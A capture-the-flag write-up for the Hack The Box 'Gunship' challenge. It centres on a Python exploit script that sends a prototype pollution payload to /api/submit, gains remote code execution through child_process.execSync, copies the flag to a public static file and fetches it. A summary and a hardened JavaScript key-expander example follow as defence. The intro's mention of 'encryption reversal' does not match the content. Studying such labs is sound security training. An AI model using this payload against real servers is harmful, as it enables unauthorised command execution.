HackTheBox Gunship Writeup
Explore the basics of cybersecurity in the Gunship Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/245
Description
A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world… all the wooing in the world to make you feel more lonely… this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶
Exploitation
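import sys

import requests


def get_base_url():
    """Build the target base URL from the <ip:port> command-line argument."""
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    # No trailing slash, so the paths appended below do not start with "//".
    return f"http://{host}:{port}"


TARGET_URL = get_base_url()

# The "__proto__.block" key is the prototype pollution vector; its "line"
# value is the JavaScript that copies the flag into the static directory.
r = requests.post(TARGET_URL + '/api/submit', json={
    "artist.name": "Gingell",
    "__proto__.block": {
        "type": "Text",
        "line": "console.log(process.mainModule.require('child_process').execSync('cat flag* > /app/static/out').toString())"
    }
})
print(r.status_code)
print(r.text)

# Fetch the file the payload wrote under /static.
print(requests.get(TARGET_URL + '/static/out').text)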
Summary
Gunship is a very-easy-level challenge on Hack The Box that is solved by exploiting prototype pollution to achieve remote code execution (RCE). A crafted payload submitted to the /api/submit endpoint injects JavaScript into the server’s execution flow, allowing arbitrary commands to run.
The payload uses child_process.execSync to read the flag file and write it to a publicly accessible location (/app/static/out). The flag is then retrieved through a simple GET request to the exposed file. This challenge highlights the dangers of prototype pollution and improper handling of untrusted input in server-side applications.
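The root cause named in the summary, shown as an added JavaScript example (not the challenge's source code or part of the original script): a naive dotted-key expander writes through `__proto__`, while a hardened one rejects such paths. It assumes the server expands dotted keys into nested objects, as the key shape of the request suggests; `unflattenNaive`, `unflattenSafe` and `demo` are hypothetical names, and the request body is constructed with an inert value.

```javascript
// Added example; helper names are hypothetical, not from the challenge source.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// Naive expander: plain property access means the segment "__proto__"
// resolves to Object.prototype, so the final write lands on every object.
function unflattenNaive(flat) {
  const out = {};
  for (const [path, value] of Object.entries(flat)) {
    const keys = path.split('.');
    let node = out;
    for (const k of keys.slice(0, -1)) {
      if (typeof node[k] !== 'object' || node[k] === null) node[k] = {};
      node = node[k];
    }
    node[keys[keys.length - 1]] = value;
  }
  return out;
}

// Hardened expander: rejects dangerous segments and builds null-prototype
// objects, so there is no inherited chain to walk into.
function unflattenSafe(flat) {
  const out = Object.create(null);
  for (const [path, value] of Object.entries(flat)) {
    const keys = path.split('.');
    if (keys.some((k) => BLOCKED.has(k))) throw new TypeError(`rejected key path: ${path}`);
    let node = out;
    for (const k of keys.slice(0, -1)) {
      if (typeof node[k] !== 'object' || node[k] === null) node[k] = Object.create(null);
      node = node[k];
    }
    node[keys[keys.length - 1]] = value;
  }
  return out;
}

function demo() {
  // Constructed body with the same key shape as the request above; inert value.
  const body = { 'artist.name': 'Gingell', '__proto__.block': { type: 'Text' } };
  unflattenNaive(body);
  const polluted = ({}).block !== undefined; // unrelated objects inherit "block"
  delete Object.prototype.block;             // restore global state
  let rejected = false;
  try { unflattenSafe(body); } catch (e) { rejected = e instanceof TypeError; }
  const clean = ({}).block === undefined;
  const name = unflattenSafe({ 'artist.name': 'Gingell' }).artist.name;
  return { polluted, rejected, clean, name };
}
console.log(demo());
```

Rejecting the request outright, rather than silently dropping the offending key, also leaves a clear signal in application logs when such a body is submitted.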